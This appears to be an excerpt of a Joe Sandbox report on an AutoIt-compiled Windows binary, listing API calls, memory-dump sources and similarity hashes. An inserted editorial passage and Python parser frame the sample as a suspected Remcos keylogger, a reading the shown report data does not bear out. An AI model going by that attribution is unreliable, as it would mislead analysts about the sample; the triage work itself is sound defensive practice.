APIs
• mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00992AF9
• OleUninitialize.OLE32(?,00000000), ref: 00992B98
• UnregisterHotKey.USER32(?), ref: 00992D7D
• DestroyWindow.USER32(?), ref: 009D3A1B
• FreeLibrary.KERNEL32(?), ref: 009D3A80
• VirtualFree.KERNEL32(?,00000000,00008000), ref: 009D3AAD
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
• String ID: close all
• API String ID: 469580280-3243417748
• Opcode ID: 834a9a3505a6cad4bdde08fb8448a5a5096525ce275b7be22d0e6e2dd5b430e0
• Instruction ID: 55890e11532ab22606c09d5f8da26c756208f0ce75391542ccaae8a0018fbfaa
• Opcode Fuzzy Hash: 834a9a3505a6cad4bdde08fb8448a5a5096525ce275b7be22d0e6e2dd5b430e0
• Instruction Fuzzy Hash: 7ED17D71741212DFCB28EF58D985B69F7A4BF44711F1182AEE84A6B352CB30AD52CF41

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 809 9c90c5-9c90d5 810 9c90ef-9c90f1 809->810 811 9c90d7-9c90ea call 9bf636 call 9bf649 809->811 813 9c9459-9c9466 call 9bf636 call 9bf649 810->813 814 9c90f7-9c90fd 810->814 827 9c9471 811->827 832 9c946c call 9c2b5c 813->832 814->813 817 9c9103-9c912e 814->817 817->813 820 9c9134-9c913d 817->820 823 9c913f-9c9152 call 9bf636 call 9bf649 820->823 824 9c9157-9c9159 820->824 823->832 825 9c915f-9c9163 824->825 826 9c9455-9c9457 824->826 825->826 830 9c9169-9c916d 825->830 831 9c9474-9c9479 826->831 827->831 830->823 835 9c916f-9c9186 830->835 832->827 838 9c9188-9c918b 835->838 839 9c91a3-9c91ac 835->839 840 9c918d-9c9193 838->840 841 9c9195-9c919e 838->841 842 9c91ae-9c91c5 call 9bf636 call 9bf649 call 9c2b5c 839->842 843 9c91ca-9c91d4 839->843 840->841 840->842 846 9c923f-9c9259 841->846 871 9c938c 842->871 844 9c91db-9c91dc call 9c3b93 843->844 845 9c91d6-9c91d8 843->845 853 9c91e1-9c91f9 call 9c2d38 * 2 844->853 845->844 848 9c932d-9c9336 call 9cfc1b 846->848 849 9c925f-9c926f 846->849 862 9c9338-9c934a 848->862 863 9c93a9 848->863 849->848 852 9c9275-9c9277 849->852 852->848 856 9c927d-9c92a3 852->856 879 9c91fb-9c9211 call 9bf649 call 9bf636 853->879 880 9c9216-9c923c call 9c97a4 853->880 856->848 860 9c92a9-9c92bc 856->860 860->848 867 9c92be-9c92c0 860->867 862->863 865 9c934c-9c935b GetConsoleMode 862->865 869 9c93ad-9c93c5 ReadFile 863->869 865->863 870 9c935d-9c9361 865->870 867->848 872 9c92c2-9c92ed 867->872 874 9c93c7-9c93cd 869->874 875 9c9421-9c942c GetLastError 869->875 870->869 876 9c9363-9c937d ReadConsoleW 870->876 877 9c938f-9c9399 call 9c2d38 871->877 872->848 878 9c92ef-9c9302 872->878 874->875 883 9c93cf 874->883 881 9c942e-9c9440 call 9bf649 call 9bf636 875->881 882 9c9445-9c9448 875->882 886 9c939e-9c93a7 876->886 887 9c937f GetLastError 876->887 877->831 878->848 891 9c9304-9c9306 878->891 879->871 880->846 881->871 888 9c944e-9c9450 882->888 889 9c9385-9c938b call 9bf613 882->889 885 9c93d2-9c93e4 883->885 885->877 896 9c93e6-9c93ea 885->896 886->885 887->889 888->877 889->871 891->848 899 9c9308-9c9328 891->899 902 9c93ec-9c93fc call 9c8de1 896->902 903 9c9403-9c940e 896->903 899->848 914 9c93ff-9c9401 902->914 908 9c941a-9c941f call 9c8c21 903->908 909 9c9410 call 9c8f31 903->909 915 9c9415-9c9418 908->915 909->915 914->877 915->914
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bf2fd671122e1c1b8317465ccaee10bb7ece308cdcb414efe81421c6edf0ae70
• Instruction ID: 6775b297f0f4fb2ad698ccdb7986a6ee368b02df77f80a8c79917ff8e40d1a4f
• Opcode Fuzzy Hash: bf2fd671122e1c1b8317465ccaee10bb7ece308cdcb414efe81421c6edf0ae70
• Instruction Fuzzy Hash: 68C1D270D04289AFDF11DFE8D849FADBBB4AF49310F18415DE954AB3A2C7349942CB62

Control-flow Graph
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID:
• String ID: d0b$d10m0$d1b$d1r0,2$d5m0$i
• API String ID: 0-4285391669
• Opcode ID: 16c192678a850401387b88bcf1ad387670ca4534157596f07332fcfd60d0227d
• Instruction ID: 403eee5cd0eae762e612f1b23b50cc84a6b9d49409405184ffc8ea0469f0cb1a
• Opcode Fuzzy Hash: 16c192678a850401387b88bcf1ad387670ca4534157596f07332fcfd60d0227d
• Instruction Fuzzy Hash: 87623770508381CFC725DF29D094AAABBE5BFC9308F14896EE4998B352DB71D945CF82

Control-flow Graph (single block 9935b3-993623: CreateWindowExW * 2, ShowWindow * 2)
APIs
• CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 009935E1
• CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00993602
• ShowWindow.USER32(00000000,?,?,?,?,?,?,00993368,?), ref: 00993616
• ShowWindow.USER32(00000000,?,?,?,?,?,?,00993368,?), ref: 0099361F
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: Window$CreateShow
• String ID: AutoIt v3$edit
• API String ID: 1584632944-3779509399
• Opcode ID: 717ae9747c1d6b53c54358061c9420c1614f0d0b998fef60bc54b2020ace3760
• Instruction ID: 9409160d031f0da7525f335806953e0007d9c7c7d5a1ff8d2ecb684ad8ebe2b4
• Opcode Fuzzy Hash: 717ae9747c1d6b53c54358061c9420c1614f0d0b998fef60bc54b2020ace3760
• Instruction Fuzzy Hash: FBF030745002947AE73187576C0CF372E7DD7C6F50B10002DFA04AB2A0C2A90842DBB0

Control-flow Graph

APIs
• LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 009D5287
  • Part of subcall function 00998577: _wcslen.LIBCMT ref: 0099858A
• Shell_NotifyIconW.SHELL32(00000001,?), ref: 00996299
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: IconLoadNotifyShell_String_wcslen
• String ID: Line %d: $AutoIt - $D$D$
• API String ID: 2289894680-1946737638
• Opcode ID: 6a04f6cdd9200452086eb64c0fe2de37b8d3745868e9b2e75139477001163c6f
• Instruction ID: 6aa171efc51cb7759d24fddc446cef0a0596a558d0b93e4f8765824f7a515dc2
• Opcode Fuzzy Hash: 6a04f6cdd9200452086eb64c0fe2de37b8d3745868e9b2e75139477001163c6f
• Instruction Fuzzy Hash: BE41B671408704AACB11EB68EC45FEF77ECAFD4320F104A2EF599921A1EF749649C792
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 009FF2AE
                                                                                                                                                                                                                                  • QueryPerformanceFrequency.KERNEL32(?), ref: 009FF2BC
                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000000), ref: 009FF2C4
                                                                                                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 009FF2CE
                                                                                                                                                                                                                                  • Sleep.KERNEL32 ref: 009FF30A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: PerformanceQuery$CounterSleep$Frequency
• String ID:
• API String ID: 2833360925-0
APIs
• RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,009958BE,SwapMouseButtons,00000004,?), ref: 009958EF
• RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,009958BE,SwapMouseButtons,00000004,?), ref: 00995910
• RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,009958BE,SwapMouseButtons,00000004,?), ref: 00995932
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID: Control Panel\Mouse
• API String ID: 3677997916-824357125
Strings
• Variable must be of type 'Object'., xrefs: 009E48C6
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID:
• String ID: Variable must be of type 'Object'.
• API String ID: 0-109567571
APIs
• __Init_thread_footer.LIBCMT ref: 009A15F2
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: Init_thread_footer
• String ID:
• API String ID: 1385522511-0
APIs
• _wcslen.LIBCMT ref: 00A0DB75
• InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00A0DB7F
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: CrackInternet_wcslen
• String ID: |
• API String ID: 596671847-2343686810
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00A0D7C2
• InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00A0D7EB
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: Internet$OpenOption
• String ID: <local>
• API String ID: 942729171-4266983199
APIs
• __CxxThrowException@8.LIBVCRUNTIME ref: 009B09D8
  • Part of subcall function 009B3614: RaiseException.KERNEL32(?,?,?,009B09FA,?,00000000,?,?,?,?,?,?,009B09FA,00000000,00A59758,00000000), ref: 009B3674
• __CxxThrowException@8.LIBVCRUNTIME ref: 009B09F5
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                                                                  • String ID: Unknown exception
                                                                                                                                                                                                                                  • API String ID: 3476068407-410509341
                                                                                                                                                                                                                                  • Opcode ID: 8a7852e02a2a748d48c8596af6cafd3e0565972398cac0d3f2f532fb704f7023
                                                                                                                                                                                                                                  • Instruction ID: f41246ed50ea447d9f86990faa75946a393a21d74f6d54e17fdcee416e7a4cd3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8a7852e02a2a748d48c8596af6cafd3e0565972398cac0d3f2f532fb704f7023
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F5F0C23490420CB7DB04BAA8DE46ADF776C6E80770B608521F924965E2FB70EA19C6D0
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00A18D52
                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 00A18D59
                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,?), ref: 00A18F3A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 146820519-0
                                                                                                                                                                                                                                  • Opcode ID: b2e1d093be1ba7c704d6fba6479e13109575816f817f6270399c2c100d94875d
                                                                                                                                                                                                                                  • Instruction ID: 63f23d968b7946d8a21756c5123dc0427c123002f19e9614822b835a7ad38883
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b2e1d093be1ba7c704d6fba6479e13109575816f817f6270399c2c100d94875d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2B126B71A083019FC714DF28C584B6ABBE5FF88314F14895DE8899B292DB35ED85CB92
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _wcslen$_strcat
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 306214811-0
                                                                                                                                                                                                                                  • Opcode ID: 2646c5ab69ddcaf8032e6cc9506e32c809b72dec473e805690b2d3cea015fa6d
                                                                                                                                                                                                                                  • Instruction ID: 9fa12fbeaeb894907c600d81653e86f75efc0c0d12e8d9655307fab553a84a90
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2646c5ab69ddcaf8032e6cc9506e32c809b72dec473e805690b2d3cea015fa6d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 15A15E31604505DFCB18DF18D5E1AAABBB1FF85314B6084ADE84A8F292DB31ED81CBC0
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0099327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 009932AF
                                                                                                                                                                                                                                    • Part of subcall function 0099327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 009932B7
                                                                                                                                                                                                                                    • Part of subcall function 0099327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 009932C2
                                                                                                                                                                                                                                    • Part of subcall function 0099327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 009932CD
                                                                                                                                                                                                                                    • Part of subcall function 0099327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 009932D5
                                                                                                                                                                                                                                    • Part of subcall function 0099327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 009932DD
                                                                                                                                                                                                                                    • Part of subcall function 00993205: RegisterWindowMessageW.USER32(00000004,?,00992964), ref: 0099325D
                                                                                                                                                                                                                                  • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00992A0A
                                                                                                                                                                                                                                  • OleInitialize.OLE32 ref: 00992A28
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000), ref: 009D3A0D
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1986988660-0
                                                                                                                                                                                                                                  • Opcode ID: 4eaa97928bedddda42e9b7361f30a863eec4a752ed78c5bf2e16972b0e1d844a
                                                                                                                                                                                                                                  • Instruction ID: aa9620272d418f5f597ff67004bc9661082fd3d8e06aa0297e1d5514ce5060c5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4eaa97928bedddda42e9b7361f30a863eec4a752ed78c5bf2e16972b0e1d844a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DD718BB0911A008ED7A8EFBDED697153AF4FB88344750853AE01AC72B2EBB84547CF55
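The record above is the one an analyst triaging a suspected Remcos keylogger would stop on: six MapVirtualKeyW calls in a row whose first arguments are all modifier keys. The following is an added example, not code from the Joe Sandbox report or from the sample. It parses the "APIs" lines exactly as the report prints them (the sample input is copied from the record above and embedded as a constructed string), decodes the virtual-key and map-type constants from the documented Win32 values, and applies a modifier-sweep heuristic; that heuristic, and the reading that such a sweep is key-table setup for a hook-based keylogger, are this editor's assumptions rather than findings stated by the report.

```python
"""Decode MapVirtualKeyW arguments from Joe Sandbox 'APIs' lines.

Added example; not part of the Joe Sandbox report or the analysed sample.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Win32 virtual-key codes from WinUser.h (documented values).
VK_NAMES = {
    0x08: "VK_BACK", 0x09: "VK_TAB", 0x0D: "VK_RETURN",
    0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU",
    0x14: "VK_CAPITAL", 0x1B: "VK_ESCAPE", 0x20: "VK_SPACE",
    0x5B: "VK_LWIN", 0x5C: "VK_RWIN",
    0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT",
    0xA2: "VK_LCONTROL", 0xA3: "VK_RCONTROL",
    0xA4: "VK_LMENU", 0xA5: "VK_RMENU",
}
MODIFIERS = {"VK_SHIFT", "VK_CONTROL", "VK_MENU", "VK_LWIN", "VK_RWIN",
             "VK_LSHIFT", "VK_RSHIFT", "VK_LCONTROL", "VK_RCONTROL",
             "VK_LMENU", "VK_RMENU"}
# MapVirtualKeyW(uCode, uMapType) map types from WinUser.h.
MAPVK = {0: "MAPVK_VK_TO_VSC", 1: "MAPVK_VSC_TO_VK",
         2: "MAPVK_VK_TO_CHAR", 3: "MAPVK_VSC_TO_VK_EX"}

# One report line: optional "Part of subcall function XXXX:" prefix,
# then Name.MODULE(args) (args optional), then "ref: ADDRESS".
API_LINE = re.compile(
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[\w@]+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Constructed sample input: the 'APIs' lines of the record above, verbatim.
SAMPLE = """
• Part of subcall function 0099327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 009932AF
• Part of subcall function 0099327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 009932B7
• Part of subcall function 0099327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 009932C2
• Part of subcall function 0099327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 009932CD
• Part of subcall function 0099327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 009932D5
• Part of subcall function 0099327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 009932DD
• Part of subcall function 00993205: RegisterWindowMessageW.USER32(00000004,?,00992964), ref: 0099325D
• GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00992A0A
• OleInitialize.OLE32 ref: 00992A28
• CloseHandle.KERNEL32(00000000,00000000), ref: 009D3A0D
"""

@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]      # raw argument tokens; '?' means the sandbox could not recover it
    ref: int             # address of the call site
    subcall: Optional[int]  # address of the callee when the line is a subcall entry

def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse every 'Name.MODULE(args), ref: addr' line of one report record."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.search(line)
        if not m:
            continue
        args = [a.strip() for a in (m["args"] or "").split(",") if a.strip()]
        sub = int(m["sub"], 16) if m["sub"] else None
        calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16), sub))
    return calls

def decode_mapvirtualkey(calls: List[ApiCall]) -> List[Tuple[str, str]]:
    """(VK name, map type) for each MapVirtualKeyW call with a concrete uCode."""
    out = []
    for c in calls:
        if c.api != "MapVirtualKeyW" or len(c.args) < 2 or c.args[0] == "?":
            continue
        vk = int(c.args[0], 16)
        mt = int(c.args[1], 16) if c.args[1] != "?" else None
        out.append((VK_NAMES.get(vk, f"VK_{vk:02X}"), MAPVK.get(mt, f"MAPVK_{mt}")))
    return out

def modifier_sweep(calls: List[ApiCall]) -> bool:
    """Analyst heuristic (assumption, not a report finding): a function that
    maps three or more distinct modifier keys to scan codes is building a key
    table, which is how hook-based keyloggers label Ctrl/Alt/Shift/Win events."""
    names = {vk for vk, _ in decode_mapvirtualkey(calls)}
    return len(names & MODIFIERS) >= 3

if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE)
    for vk, mt in decode_mapvirtualkey(parsed):
        print(f"{vk:12s} {mt}")
    print("modifier sweep:", modifier_sweep(parsed))
```

The decoder deliberately skips arguments the sandbox prints as `?`; guessing them would turn a recovered constant into an invented one. Running it on a whole report (every "APIs" block, not just this record) gives a quick list of functions worth opening in the dump, and the same parser works unchanged for other API families because it keeps the raw argument tokens.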
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 009961A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00996299
                                                                                                                                                                                                                                  • KillTimer.USER32(?,00000001,?,?), ref: 009AFD36
                                                                                                                                                                                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 009AFD45
                                                                                                                                                                                                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 009EFE33
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: IconNotifyShell_Timer$Kill
• String ID:
• API String ID: 3500052701-0
• Opcode ID: 3c1f7d76eb718c38456feb583711a8a03445d0e1e7bf925a73244abb6a4b8349
• Instruction ID: 78c1b4df0ef187e24a486a71846a7d3695a6a4c736f139b42b8cb4836d161c52
• Opcode Fuzzy Hash: 3c1f7d76eb718c38456feb583711a8a03445d0e1e7bf925a73244abb6a4b8349
• Instruction Fuzzy Hash: 60319571904784AFEB33CF658865BE6BBEC9B06308F1008AED59957282D3786E85CB51
APIs
• FindCloseChangeNotification.KERNEL32(00000000,00000000,?,?,009C894C,?,00A59CE8,0000000C), ref: 009C8A84
• GetLastError.KERNEL32(?,009C894C,?,00A59CE8,0000000C), ref: 009C8A8E
• __dosmaperr.LIBCMT ref: 009C8AB9
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
